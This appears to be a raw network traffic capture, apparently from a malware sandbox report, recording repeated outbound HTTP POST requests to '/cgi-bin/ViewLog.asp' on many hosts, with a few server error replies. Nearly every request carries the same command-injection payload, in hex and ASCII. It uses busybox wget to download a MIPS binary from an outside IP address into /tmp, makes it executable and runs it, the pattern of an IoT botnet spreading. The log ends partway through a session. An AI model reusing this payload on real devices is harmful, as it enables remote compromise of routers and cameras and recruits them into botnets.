                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              502192.168.2.143814094.122.64.748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.818967104 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              503192.168.2.145700462.29.77.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.820782900 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              504192.168.2.143621662.29.76.1748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.825278997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              505192.168.2.145543685.69.35.1228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.839355946 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.082034111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:56.225790024 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.257282972 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              506192.168.2.144612894.122.56.1828080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.881052971 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              507192.168.2.145040062.24.212.628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.903392076 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.079015017 CET148INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:17:46 GMT
                                              Connection: Close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              508192.168.2.144434262.204.94.2058080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.910602093 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.095103979 CET751INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:46 GMT
                                              Server: Apache/2.4.56 (Debian)
                                              Referrer-Policy: no-referrer
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              X-Permitted-Cross-Domain-Policies: none
                                              X-Robots-Tag: noindex, nofollow
                                              X-XSS-Protection: 1; mode=block
                                              Content-Length: 304
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              509192.168.2.143627031.136.152.2558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.912533998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.490294933 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:48.610106945 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.850060940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.457915068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.417442083 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.592791080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              510192.168.2.143353285.122.199.588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.944632053 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              511192.168.2.143345694.131.59.1418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.140732050 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.350521088 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/6.0.0-20220501-re899e0c27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:17:47 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3572
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Cache-Status: ezproxies.com
                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              512192.168.2.145456485.69.38.288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:47.178198099 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
